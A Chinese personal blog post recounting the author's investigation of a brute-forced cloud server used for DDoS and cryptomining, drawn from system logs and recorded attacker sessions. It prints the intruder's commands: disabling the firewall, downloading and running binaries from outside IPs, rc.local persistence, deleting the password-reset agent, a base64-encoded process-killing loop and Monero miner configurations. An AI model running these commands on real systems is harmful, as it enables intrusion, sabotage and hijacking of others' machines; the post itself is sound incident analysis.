<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>记录人生中第一次发现电脑被入侵 | Zhengyu Zhang</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="2019年的最后一天下午，突然收到了百度云发来的短信，说我的服务器正在恶意攻击别人：">
<meta property="og:type" content="article">
<meta property="og:title" content="记录人生中第一次发现电脑被入侵">
<meta property="og:url" content="https://freemandealer.github.io/gallery/2020/01/06/dont-hack-me/index.html">
<meta property="og:site_name" content="Zhengyu Zhang">
<meta property="og:description" content="2019年的最后一天下午，突然收到了百度云发来的短信，说我的服务器正在恶意攻击别人：">
<meta property="og:image" content="https://freemandealer.github.io/gallery/img/2D1352707033F95409E6E9833.jpg?30">
<meta property="og:image" content="https://freemandealer.github.io/gallery/img/adasd.png?80">
<meta property="og:image" content="https://freemandealer.github.io/gallery/img/E86A7D8EC6E9D9F5CF515AB0AC8862E8.png?40">
<meta property="og:image" content="https://freemandealer.github.io/gallery/img/hackme_sadfdsfa.png?40">
<meta property="og:image" content="https://freemandealer.github.io/gallery/img/hackme_uploader.png?25">
<meta property="og:image" content="https://freemandealer.github.io/gallery/img/image-20200102120937588.png?30">
<meta property="og:image" content="https://freemandealer.github.io/gallery/img/image-20200102191830507.png">
<meta property="og:image" content="https://freemandealer.github.io/gallery/img/image-20200102191424119.png?60">
<meta property="og:updated_time" content="2020-01-10T05:21:38.535Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="记录人生中第一次发现电脑被入侵">
<meta name="twitter:description" content="2019年的最后一天下午，突然收到了百度云发来的短信，说我的服务器正在恶意攻击别人：">
  
    <link rel="alternative" href="/atom.xml" title="Zhengyu Zhang" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  <link rel="stylesheet" href="/css/style.css" type="text/css">
  
<script type="text/javascript">
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "//hm.baidu.com/hm.js?5571210c2d0c5192f3d72e18d559d836";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>


</head>

<script src="/js/hexo_resize_image.js"></script>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
	<header id="header" class="inner">
		<a href="/" class="profilepic">
			
			<img lazy-src="https://freemandealer.github.io/img/avatar.jpg" class="js-avatar">
			
		</a>

		<hgroup>
		  <h1 class="header-author"><a href="/">Zhengyu Zhang</a></h1>
		</hgroup>

		
		<p class="header-subtitle">This world is a playground.</p>
		

		
			<div class="switch-btn">
				<div class="icon">
					<div class="icon-ctn">
						<div class="icon-wrap icon-house" data-idx="0">
							<div class="birdhouse"></div>
							<div class="birdhouse_holes"></div>
						</div>
						<div class="icon-wrap icon-ribbon hide" data-idx="1">
							<div class="ribbon"></div>
						</div>
						
						<div class="icon-wrap icon-link hide" data-idx="2">
							<div class="loopback_l"></div>
							<div class="loopback_r"></div>
						</div>
						
						
					</div>
					
				</div>
				<div class="tips-box hide">
					<div class="tips-arrow"></div>
					<ul class="tips-inner">
						<li>菜单</li>
						<li>标签</li>
						
						<li>友情链接</li>
						
						
					</ul>
				</div>
			</div>
		

		<div class="switch-area">
			<div class="switch-wrap">
				<section class="switch-part switch-part1">
					<nav class="header-menu">
						<ul>
						
							<li><a href="/">主页</a></li>
				        
							<li><a href="/archives">所有文章</a></li>
				        
							<li><a href="/gallery">美术作品</a></li>
				        
							<li><a href="/chat/index.html">聊聊天</a></li>
				        
						</ul>
					</nav>
					<nav class="header-nav">
						<div class="social">
							
								<a class="github" target="_blank" href="https://github.com/freemandealer/" title="github">github</a>
					        
								<a class="weibo" target="_blank" href="http://weibo.com/u/1040041447" title="weibo">weibo</a>
					        
								<a class="rss" target="_blank" href="/atom.xml" title="rss">rss</a>
					        
								<a class="douban" target="_blank" href="http://www.douban.com/people/83287869/" title="douban">douban</a>
					        
								<a class="mail" target="_blank" href="/freeman.zhang1992@gmail.com" title="mail">mail</a>
					        
								<a class="google" target="_blank" href="https://plus.google.com/u/0/113872517921961499881/posts" title="google">google</a>
					        
						</div>
					</nav>
				</section>
				
				
				<section class="switch-part switch-part2">
					<div class="widget tagcloud" id="js-tagcloud">
						<a href="/tags/Life/" style="font-size: 10px;">Life</a> <a href="/tags/Meta/" style="font-size: 16.67px;">Meta</a> <a href="/tags/Note/" style="font-size: 20px;">Note</a> <a href="/tags/Notes/" style="font-size: 13.33px;">Notes</a> <a href="/tags/元知识/" style="font-size: 10px;">元知识</a>
					</div>
				</section>
				
				
				
				<section class="switch-part switch-part3">
					<div id="js-friends">
					
			          <a target="_blank" class="main-nav-link switch-friends-link" href="http://blog.septicmk.com">SepticMK</a>
			        
			          <a target="_blank" class="main-nav-link switch-friends-link" href="http://www.maxwellxxx.com">Maxwellxly</a>
			        
			        </div>
				</section>
				

				
			</div>
		</div>
	</header>				
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
  	<div class="overlay">
  		<div class="slider-trigger"></div>
  		<h1 class="header-author js-mobile-header hide">Zhengyu Zhang</h1>
  	</div>
	<div class="intrude-less">
		<header id="header" class="inner">
			<div class="profilepic">
				<img lazy-src="https://freemandealer.github.io/img/avatar.jpg" class="js-avatar">
			</div>
			<hgroup>
			  <h1 class="header-author">Zhengyu Zhang</h1>
			</hgroup>
			
			<p class="header-subtitle">This world is a playground.</p>
			
			<nav class="header-menu">
				<ul>
				
					<li><a href="/">主页</a></li>
		        
					<li><a href="/archives">所有文章</a></li>
		        
					<li><a href="/gallery">美术作品</a></li>
		        
					<li><a href="/chat/index.html">聊聊天</a></li>
		        
		        <div class="clearfix"></div>
				</ul>
			</nav>
			<nav class="header-nav">
				<div class="social">
					
						<a class="github" target="_blank" href="https://github.com/freemandealer/" title="github">github</a>
			        
						<a class="weibo" target="_blank" href="http://weibo.com/u/1040041447" title="weibo">weibo</a>
			        
						<a class="rss" target="_blank" href="/atom.xml" title="rss">rss</a>
			        
						<a class="douban" target="_blank" href="http://www.douban.com/people/83287869/" title="douban">douban</a>
			        
						<a class="mail" target="_blank" href="/freeman.zhang1992@gmail.com" title="mail">mail</a>
			        
						<a class="google" target="_blank" href="https://plus.google.com/u/0/113872517921961499881/posts" title="google">google</a>
			        
				</div>
			</nav>
		</header>				
	</div>
</nav>
      <div class="body-wrap"><article id="post-dont-hack-me" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2020/01/06/dont-hack-me/" class="article-date">
  	<time datetime="2020-01-06T13:52:03.000Z" itemprop="datePublished">2020-01-06</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      记录人生中第一次发现电脑被入侵
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        
	<div class="article-tag tagcloud">
		<ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Meta/">Meta</a></li></ul>
	</div>

        

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
        <p>2019年的最后一天下午，突然收到了百度云发来的短信，说我的服务器正在恶意攻击别人：</p>
<a id="more"></a>
<p><img src="/img/2D1352707033F95409E6E9833.jpg?30" alt=""></p>
<p>登陆百度云后，收到了站内信：</p>
<p><img src="/img/adasd.png?80" alt=""></p>
<p>作为一个良民，我从来不琢磨攻击别人这件事。无辜又疑惑的我提工单寻求帮助，技术支持提供了具体的攻击手段SYNC_FLOOD（查了一下属于DDoS的一种）和攻击时间（12-30 的 12:05 至 18:41）。</p>
<p><img src="/img/E86A7D8EC6E9D9F5CF515AB0AC8862E8.png?40" alt=""></p>
<p>对着时间，往上查了一下系统日志，马上就精神了。</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"># &#36825;&#37324;&#26159;&#33021;&#30475;&#21040;&#30340;&#26368;&#26089;&#30340;&#26085;&#24535;&#10;Dec 30 03:42:01 instance-3eq6v61r cron[1064]: (*system*) RELOAD (/etc/crontab)&#10;Dec 30 04:17:01 instance-3eq6v61r CRON[15653]: (root) CMD (   cd / &#38;&#38; run-parts --report /etc/cron.hourly)&#10;Dec 30 05:17:01 instance-3eq6v61r CRON[23129]: (root) CMD (   cd / &#38;&#38; run-parts --report /etc/cron.hourly)&#10;Dec 30 06:17:01 instance-3eq6v61r CRON[30198]: (root) CMD (   cd / &#38;&#38; run-parts --report /etc/cron.hourly)&#10;Dec 30 06:25:01 instance-3eq6v61r CRON[31138]: (root) CMD (test -x /usr/sbin/anacron || ( cd / &#38;&#38; run-parts --report /etc/cron.daily ))&#10;Dec 30 06:25:01 instance-3eq6v61r rsyslogd: [origin software=&#34;rsyslogd&#34; swVersion=&#34;8.16.0&#34; x-pid=&#34;1009&#34; x-info=&#34;http://www.rsyslog.com&#34;] rsyslogd was HUPed&#10;Dec 30 06:25:01 instance-3eq6v61r kernel: [151273.108068] EXT4-fs warning (device sda): htree_dirblock_to_tree:959: inode #2: lblock 0: comm updatedb.mlocat: error -5 reading directory block&#10;Dec 30 07:17:01 instance-3eq6v61r CRON[5112]: (root) CMD (   cd / &#38;&#38; run-parts --report /etc/cron.hourly)&#10;Dec 30 08:17:01 instance-3eq6v61r CRON[12087]: (root) CMD (   cd / &#38;&#38; run-parts --report /etc/cron.hourly)&#10;#&#36825;&#37324;&#34987;&#25104;&#21151;&#30331;&#20837;&#20102;&#65292;&#30475;&#26102;&#38388;&#19981;&#26159;&#26412;&#20154;&#10;Dec 30 08:44:54 instance-3eq6v61r systemd[1]: Started Session 225 of user root.</span><br></pre></td></tr></table></figure>
<p>syslog日志显示，在 Dec 30 08:44:54 有其他人登陆过我的系统。并且有一个奇怪的定时任务 ( cron.hourly ) 每小时都会执行一遍。接着我有看了一下 auth 日志，它会记录各种登陆时的验证信息，包括失败的验证和成功的验证。</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">...&#10;Dec 30 08:40:33 instance-3eq6v61r sshd[14727]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=51.91.136.174  user=root&#10;Dec 30 08:40:35 instance-3eq6v61r sshd[14727]: Failed password for root from 51.91.136.174 port 49568 ssh2&#10;Dec 30 08:40:36 instance-3eq6v61r sshd[14727]: Received disconnect from 51.91.136.174 port 49568:11: Normal Shutdown, Thank you for playing [preauth]&#10;Dec 30 08:40:36 instance-3eq6v61r sshd[14727]: Disconnected from 51.91.136.174 port 49568 [preauth]&#10;Dec 30 08:44:54 instance-3eq6v61r sshd[15221]: Accepted password for root from 51.91.136.174 port 47114 ssh2  # &#25214;&#21040;&#20102;&#23545;&#24212;&#30340;&#34987;&#20182;&#20154;&#25104;&#21151;&#30331;&#20837;&#30340;&#28857;&#65292;&#26102;&#38388;&#23545;&#30340;&#19978;&#12290;&#22855;&#24618;&#30340;&#26159;&#21518;&#38754;&#20182;&#36824;&#22312;&#19981;&#20572;&#35797;&#23494;&#30721;&#65292;&#26159;&#20195;&#30721;&#27809;&#20889;&#22909;&#65292;&#36824;&#26159;&#40657;&#23458;&#19981;&#21482;&#19968;&#20010;&#65311;&#10;Dec 30 08:44:54 instance-3eq6v61r sshd[15221]: pam_unix(sshd:session): session opened for user root by (uid=0)&#10;Dec 30 08:44:54 instance-3eq6v61r systemd-logind[1027]: New session 225 of user root.&#10;Dec 30 08:44:55 instance-3eq6v61r sshd[15221]: Received disconnect from 51.91.136.174 port 47114:11: Normal Shutdown, Thank you for playing&#10;Dec 30 08:44:55 instance-3eq6v61r sshd[15221]: Disconnected from 51.91.136.174 port 47114&#10;Dec 30 08:44:55 instance-3eq6v61r sshd[15221]: pam_unix(sshd:session): session closed for user root&#10;Dec 30 08:44:55 instance-3eq6v61r systemd-logind[1027]: Removed session 225.&#10;Dec 30 08:49:22 instance-3eq6v61r sshd[15784]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=51.91.136.174  user=root&#10;Dec 30 08:49:25 instance-3eq6v61r sshd[15784]: Failed password for root from 51.91.136.174 port 44660 ssh2&#10;Dec 30 08:49:25 instance-3eq6v61r sshd[15784]: Received disconnect from 51.91.136.174 port 44660:11: Normal Shutdown, Thank you for playing [preauth]&#10;Dec 30 08:49:25 instance-3eq6v61r sshd[15784]: Disconnected from 51.91.136.174 port 44660 [preauth]&#10;Dec 30 08:54:01 instance-3eq6v61r sshd[16302]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=51.91.136.174  user=root&#10;Dec 30 08:54:03 instance-3eq6v61r sshd[16302]: Failed password for root from 51.91.136.174 port 42206 ssh2&#10;...</span><br></pre></td></tr></table></figure>
<p>日志显示 Dec 30 08:44:54 确实有人成功登陆了我的机器，登陆者的 ip 为 51.91.136.174。这个 ip 在成功登陆之前做了很多很多错误的尝试。看来是通过暴力破解进入的。这里说明一下，我这台机器是为了测试一个小东西临时创建的云虚机，所以使用了一个不严肃的密码: test@123。在配置密码时百度云其实已经提示我弱口令警告了，但我为了图方便没有管警告。</p>
<p>日志中比较有意思的还有亮点，这个 ip 成功登陆后还在不停尝试其它密码，估计是暴力破解的代码没写好，进程/线程没有同步导致的。另外除了这个 ip 以外，还有很多 ip 在尝试登陆。这说明入侵者有很多肉机，也有可能尝试的入侵者不止一波人。这些来自很多国家和地区，随便查了其中两个ip的归属地，分别来自法国和荷兰。</p>
<p>接下来，我又查看了一下命令历史记录，没想到真的有记录。在我印象中，入侵最后一步不是要清除痕迹的吗？难道是新手？还是说他觉得这台机器的主人不会查记录？说实话，如果不是百度云风控报警，我也不会注意我的机器被入侵。先来看一下他的操作记录：</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">629  root 2019/12/29 19:20:47 service iptables stop&#10;630  root 2019/12/29 19:20:50 wget http://111.38.249.179:45889/java-id&#10;631  root 2019/12/29 19:22:02 chmod 777 java-id&#10;632  root 2019/12/29 19:22:02 ./java-id&#10;633  root 2019/12/29 19:22:02 cd /tmp&#10;634  root 2019/12/29 19:22:02 service iptables stop&#10;635  root 2019/12/29 19:22:03 wget http://111.38.249.179:45889/java-mm&#10;636  root 2019/12/29 19:22:25 chmod 777 java-mm&#10;637  root 2019/12/29 19:22:25 ./java-mm&#10;638  root 2019/12/29 19:22:25 echo &#34;cd  /root/&#34;&#62;&#62;/etc/rc.local&#10;639  root 2019/12/29 19:22:25 echo &#34;./java-id&#38;&#34;&#62;&#62;/etc/rc.local&#10;640  root 2019/12/29 19:22:25 echo &#34;./java-mm&#38;&#34;&#62;&#62;/etc/rc.local&#10;641  root 2019/12/29 19:22:25 echo &#34;/etc/init.d/iptables stop&#34;&#62;&#62;/etc/rc.local&#10; &#10;827  root 2019/12/30 03:40:39 service iptables stop&#10;828  root 2019/12/30 03:40:43 wget http://111.39.153.250:27788/jdk-8k&#10;829  root 2019/12/30 03:40:47 chmod 777 jdk-8k&#10;830  root 2019/12/30 03:40:51 ./jdk-8k&#10;831  root 2019/12/30 03:40:55 cd /usr/sbin/&#10;832  root 2019/12/30 03:40:59 service iptables stop&#10;833  root 2019/12/30 03:41:03 wget http://111.39.153.250:27788/jdk-9k&#10;834  root 2019/12/30 03:41:07 chmod 777 jdk-9k&#10;835  root 2019/12/30 03:41:11 ./jdk-9k&#10;836  root 2019/12/30 03:41:15 echo &#34;cd  /root/&#34;&#62;&#62;/etc/rc.local&#10;837  root 2019/12/30 03:41:19 echo &#34;./jdk-8k&#38;&#34;&#62;&#62;/etc/rc.local&#10;838  root 2019/12/30 03:41:23 echo &#34;./jdk-9k&#38;&#34;&#62;&#62;/etc/rc.local&#10;839  root 2019/12/30 03:41:27 echo &#34;/etc/init.d/iptables stop&#34;&#62;&#62;/etc/rc.local</span><br></pre></td></tr></table></figure>
<p>历史记录显示这家伙关了我的防火墙，然后从 111.38.249.179:45889 下载了两个可执行文件，名字分别叫做 jdk-8k 和 jdk-9k，并且运行了它们。对于这个 ip 查看到它来自国内安徽六安。</p>
<p>随后我去目录里寻找 jdk-8k、jdk-9k 这两个可疑文件，然而什么都没找到。另外我探测了 111.38.249.179 这台主机，显示主机活着，但45889和27788两个端口拒绝了我的连接。这意味着有如下几种可能：</p>
<ul>
<li>入侵者删除了文件，并隐藏了删除操作的历史 （基本没可能，他要会隐藏历史就不会让我看到上面这些）</li>
<li>这几个文件运行时自销毁（高级！）</li>
<li>这些命令是脚本敲入或是批量复制粘贴的，其实根本没有成功（这意味DDoS攻击的发起另有他人）</li>
</ul>
<p>如果说另有其人的话，会是上面那个每小时跑一遍的定时任务吗？我找到了 conb.hourly 所执行的二进制文件 /lib/udev/udev，用 gdb 反汇编：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">Dump of assembler code <span class="keyword">for</span> function main:</span><br><span class="line">	<span class="number">0x0804b759</span> &lt;+<span class="number">897</span>&gt;:	call   <span class="number">0x8049360</span> &lt;encrypt_code&gt;</span><br><span class="line">	...</span><br><span class="line">	<span class="number">0x0804b889</span> &lt;+<span class="number">1201</span>&gt;:	call   <span class="number">0x8048555</span> &lt;readfile&gt;</span><br><span class="line">	...</span><br><span class="line">	<span class="number">0x0804ba5d</span> &lt;+<span class="number">1669</span>&gt;:	call   <span class="number">0x8048cdc</span> &lt;DelService&gt;</span><br><span class="line">	...</span><br><span class="line">	<span class="number">0x0804bb1a</span> &lt;+<span class="number">1858</span>&gt;:	call   <span class="number">0x8048796</span> &lt;writefile&gt;</span><br><span class="line">	...</span><br><span class="line">	<span class="number">0x0804bdba</span> &lt;+<span class="number">2530</span>&gt;:	call   <span class="number">0x8048b8c</span> &lt;InstallSYS&gt;</span><br><span class="line">	...</span><br><span class="line">	<span class="number">0x0804bdcd</span> &lt;+<span class="number">2549</span>&gt;:	call   <span class="number">0x804a289</span> &lt;CheckLKM&gt;</span><br><span class="line">	...</span><br><span class="line">	<span class="number">0x0804be80</span> &lt;+<span class="number">2728</span>&gt;:	call   <span class="number">0x804d0ac</span> &lt;decrypt_remotestr&gt;</span><br><span class="line">	...</span><br><span class="line">	<span class="number">0x0804bea7</span> &lt;+<span class="number">2767</span>&gt;:	call   <span class="number">0x804a365</span> &lt;HidePidPort&gt;</span><br><span class="line">	...s s</span><br></pre></td></tr></table></figure>
<p>不用仔细看，光读函数名就不自然。首先是这个刺眼驼峰拼写法，显然不像 udev 的作风。接着我们知道udev是linux管理设备和驱动的一个模块（具体可以看我之前的文章 <a href="http://freemandealer.github.io/2016/09/01/device-driver-linux-device-driver/">设备驱动 - Linux Device Driver Model</a>），它从不与 “remote” 进行交互。不管它是不是ddos攻击的发起程序，它一定不是真正的 udev。最后看那些 “encrypt” “decrypt” “Hide” 的字眼，偷偷摸摸一看就不正经。 </p>
<p>到此，对于我被 DDoS 已经有了一些头绪：我的服务器被人入侵了，在里面跑了一些乱七八糟的程序。但是还有很多问题没搞清楚：</p>
<ul>
<li>入侵者有几个？jdk小子 和 udev小子 是同一人还是两波人吗？还会有第三个人、第四个人、第五个人吗？</li>
<li>DDoS 到底是那个程序发起的，神秘消失的 jdk 还是鬼鬼祟祟的 udev? 抑或是其它我未曾探知的程序？</li>
</ul>
<p>收集到的信息不多，我决定在系统上运行 script 并隐藏起来，等入侵者下次光临时录下他的一举一动，看看他们到底在干什么、怎么干的。</p>
<p>过了一天后，在2020年的第一天，我发现入侵者果然再次光临了我的服务器。1月1号夜里23点24分，他潜入后进行了一波操作。不像上次留了很多历史记录给我追查，这次他谨慎地对入侵痕迹进行了清理：删掉了登陆记录和命令执行历史。不过由于之前开起了 script 对所有登陆者的操作进行录屏，所以还是捕捉到了他的一举一动。通过回放操作我发现，入侵者的操作基本上是复制粘贴现成脚本结合手动异常处理，并非是完全自动化脚本。这次进来，他同样熟练地关防火墙，然后开始下载运行他的 jdk 们，最后清理操作痕迹。通过记录可以看到，jdk 下载是成功的，同时也没有手动删除的操作，说明它们确实是运行中自销毁的程序。</p>
<p><img src="/img/hackme_sadfdsfa.png?40" alt=""></p>
<p>另外这次他的操作明显与上次操作风格不一样，变得非常谨慎。他可能注意到我可能注意到他的入侵了。为了避免他发现我发现了他，我也尽量减少自己的足迹。之前我通过命令前加空格来避免自己排查黑客行为的命令被记录在历史中，但有时候命令敲快了就忘了，而且因为不能复用历史命令，这也降低了我的排查效率。考虑到linux会把当前会话的历史记录在内存中，只有回话退出时才写入文件，所以我只要不退出会话。这次我通过百度云提供的网页vnc来保持我的会话。这样做的一个额外好处是，我避免了 script 录制到我自己的操作。</p>
<p>后来证明，我用 vnc 保持会话的决策是正确的。2020年1月2号凌晨1点18分，又有人登陆了会话。但是这次，我无法通过自己的密码登陆我的服务器了。入侵者竟然给我改了密码！虽然通过百度云提供的改密服务可以强行把密码设置回来，但这样一来他就会发现我发现了他的入侵，会比较尬。还好 vnc 保持的会话还在，登上去回放一下他的操作记录，原来是把我的密码改成了 BrrrrrBBBxgdQr37。再看紧接着后面的命令，背后后一阵冰凉：</p>
<figure class="highlight autoit"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">root<span class="constant">@instance</span>-<span class="number">3</span>eq6v61r:~<span class="preprocessor"># rm -rf /CloudResetPwdUpdateAgent</span></span><br></pre></td></tr></table></figure>
<p>这是想把云服务提供的重设密码功能也给我停掉吗？太阴险了这个人，奔着霸占我的服务器来并且下了死手！再次感谢我的 vnc 的会话。另外被这两句命令戳中笑点：</p>
<figure class="highlight autoit"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">root<span class="constant">@instance</span>-<span class="number">3</span>eq6v61r:/<span class="built_in">opt</span>/nu<span class="preprocessor"># pkill -9 Trump<span class="comment">;</span></span></span><br><span class="line">root<span class="constant">@instance</span>-<span class="number">3</span>eq6v61r:/<span class="built_in">opt</span>/nu<span class="preprocessor"># pkill -9 Donald<span class="comment">;</span></span></span><br></pre></td></tr></table></figure>
<p>接着继续观赏他的其它操作，他的工具是从up2www这个网站下载的，我也进入这个网站看看：</p>
<p><img src="/img/hackme_uploader.png?25" alt=""></p>
<p>。。。不认识这个文字。Google翻译一下，在规则页面中发现原来是伊斯兰共和国的网站。</p>
<p><img src="/img/image-20200102120937588.png?30" alt=""></p>
<p>据此判断是个外国入侵者的可能性挺大。顺手给这个网站举报一下工具上传者。</p>
<p>另外判断是外国入侵者的依据是我观察到的一个现象：他总是用 bing.com 来判断网络联通性而不是 ping baidu.com 更不是 ping google.com。因此真相只有一个：他很有可能是知道我国国情的外国黑客。</p>
<p>凌晨1点的这次登陆，除了改密码独占我的服务器，主要还是关闭系统防御，做入侵者的事，清楚记录这三步。当然受限于中国的绿色网络长城，他的很多操作都没能一下成功，也是折腾了不轻。GFW 干得漂亮！</p>
<p>跟着入侵者的操作，找到了他部署在我服务器上的文件：</p>
<figure class="highlight clojure"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="collection">[<span class="collection">&#123;<span class="string">"url"</span>:<span class="string">"pool.supportxmr.com:3000"</span>,<span class="string">"user"</span>:<span class="string">"8721pHzrmSB2xPpmRxvU9CXU9cXhom87fEgBkXRjVp4nBvJnyvC6ke2ZUrs6MjPD6 ^M6RW1paxQScKCgXwwiYaUPEVFNB468G"</span>,<span class="string">"pass"</span>:<span class="string">"xx"</span>,<span class="string">"coin"</span>:<span class="string">"monero"</span>,<span class="string">"algo"</span>:<span class="string">"rx/0"</span>,<span class="string">"tls"</span><span class="attribute">:false</span>,<span class="string">"tls-fingerprint"</span><span class="attribute">:null</span>&#125;</span>,<span class="collection">&#123;<span class="string">"url"</span>:<span class="string">"de03.supportxmr.com:3000"</span>,<span class="string">"u ^Mser"</span>:<span class="string">"8721pHzrmSB2xPpmRxvU9CXU9cXhom87fEgBkXRjVp4nBvJnyvC6ke2ZUrs6MjPD66RW1paxQScKCgXwwiYaUPEVFNB468G"</span>,<span class="string">"pass"</span>:<span class="string">"xx"</span>,<span class="string">"coin"</span>:<span class="string">"monero"</span>,<span class="string">"algo"</span>:<span class="string">"rx/0"</span>,<span class="string">" ^Mtls"</span><span class="attribute">:false</span>,<span class="string">"tls-fingerprint"</span><span class="attribute">:null</span>&#125;</span>,<span class="collection">&#123;<span class="string">"url"</span>:<span class="string">"pool.supportxmr.com:443"</span>,<span class="string">"user"</span>:<span class="string">"8721pHzrmSB2xPpmRxvU9CXU9cXhom87fEgBkXRjVp4nBvJnyvC6ke2ZUrs6MjPD66RW1p ^MaxQScKCgXwwiYaUPEVFNB468G"</span>,<span class="string">"pass"</span>:<span class="string">"xx"</span>,<span class="string">"coin"</span>:<span class="string">"monero"</span>,<span class="string">"algo"</span>:<span class="string">"rx/0"</span>,<span class="string">"tls"</span><span class="attribute">:true</span>,<span class="string">"tls-fingerprint"</span><span class="attribute">:null</span>&#125;</span>,<span class="collection">&#123;<span class="string">"url"</span>:<span class="string">"de03.supportxmr.com:9000"</span>,<span class="string">"user"</span>:<span class="string">" ^M8AriWF4frRPjgpJfgUYjLR5SML2Dz3eTc9iEMRbvt41SF6vzeJq1sJsRrc8iWYerVNZfs8rctwhvRFXgd2Cc64F3UmYvQNS"</span>,<span class="string">"pass"</span>:<span class="string">"x"</span>,<span class="string">"coin"</span>:<span class="string">"monero"</span>,<span class="string">"algo"</span>:<span class="string">"rx/0"</span>,<span class="string">"tls"</span><span class="attribute">:tr</span> <span class="comment">^Mue</span>,<span class="string">"tls-fingerprint"</span><span class="attribute">:null</span>&#125;</span>,<span class="collection">&#123;<span class="string">"url"</span>:<span class="string">"hk02.supportxmr.com:443"</span>,<span class="string">"user"</span>:<span class="string">"8AriWF4frRPjgpJfgUYjLR5SML2Dz3eTc9iEMRbvt41SF6vzeJq1sJsRrc8iWYerVNZfs8rctwhvRF ^MXgd2Cc64F3UmYvQNS"</span>,<span class="string">"pass"</span>:<span class="string">"x"</span>,<span class="string">"coin"</span>:<span class="string">"monero"</span>,<span class="string">"algo"</span>:<span class="string">"rx/0"</span>,<span class="string">"tls"</span><span class="attribute">:true</span>,<span class="string">"</span><br><span class="line">...</span></span></span></span><br></pre></td></tr></table></figure>
<p>历史记录中的神秘代码，base64编码：</p>
<figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">watch -n <span class="number">5</span> `<span class="regexp">/bin/</span>bash -c <span class="string">"base64 -d &lt;&lt;&lt; "</span>YT1gcHMgYWh1eCAtLXNvcnQ9LWMgfCBhd2sgJ3tpZigkMz4xMC4wICYmICQxMSE9Ii9vcHQvbnUvc3NoLWRhZW1vbiIgJiYgJDExIT0iL3Vzci9iaW4vc3VkbyIgJiYgJDExIT0iL2Jpbi9iYXNoIilwcmludGYiJTZkXG4iLCQyLCQxMX0nYDtmb3IgaSBpbiAkYTsgZG8gYT1gcmVhZGxpbmsgL3Byb2MvJGkvZXhlYDtraWxsIC05ICRpOyBjcCAkYSAkYS5vbGQ7Y2hhdHRyIC1pYSAkYTsgY2htb2QgLXggJGE7cm0gLXJmICRhO3RvdWNoICRhOyBjaGF0dHIgK2lhICRhOyAgZG9uZTs<span class="string">""</span>` &amp;&gt; <span class="regexp">/dev/</span><span class="keyword">null</span> &amp;^M</span><br></pre></td></tr></table></figure>
<p>解码后得到：</p>
<figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a=`ps ahux --<span class="keyword">sort</span>=-c | awk '&#123;<span class="keyword">if</span>(<span class="label">$3</span>&gt;10.0 &amp;&amp; <span class="label">$11</span>!=<span class="string">"/opt/nu/ssh-daemon"</span> &amp;&amp; <span class="label">$11</span>!=<span class="string">"/usr/bin/sudo"</span> &amp;&amp; <span class="label">$11</span>!=<span class="string">"/bin/bash"</span>)printf<span class="string">"%6d\n"</span>,<span class="label">$2</span>,<span class="label">$11&#125;</span>'`;<span class="keyword">for</span> i <span class="keyword">in</span> <span class="label">$a</span>; <span class="keyword">do</span> a=`readlink /proc/<span class="label">$i</span>/exe`;kill -9 <span class="label">$i</span>; cp <span class="label">$a</span> <span class="label">$a</span>.old;chattr -ia <span class="label">$a</span>; chmod -x <span class="label">$a</span>;<span class="keyword">rm</span> -rf <span class="label">$a</span>;touch <span class="label">$a</span>; chattr +ia <span class="label">$a</span>;  don</span><br></pre></td></tr></table></figure>
<p>加上这段：</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nohup ./ssh-daemon -o pool<span class="class">.supportxmr</span><span class="class">.com</span>:<span class="number">3333</span> -u <span class="number">8721</span>pHzrmSB2xPpmRxvU9CXU9cXhom87fEgBkXRjVp4nBvJnyvC6ke2ZUrs6Mj ^MPD66RW1paxQScKCgXwwiYaUPEVFNB468G -coin monero -<span class="tag">a</span> rx/<span class="number">0</span> &amp;&gt; log<span class="class">.txt</span> &amp;</span><br></pre></td></tr></table></figure>
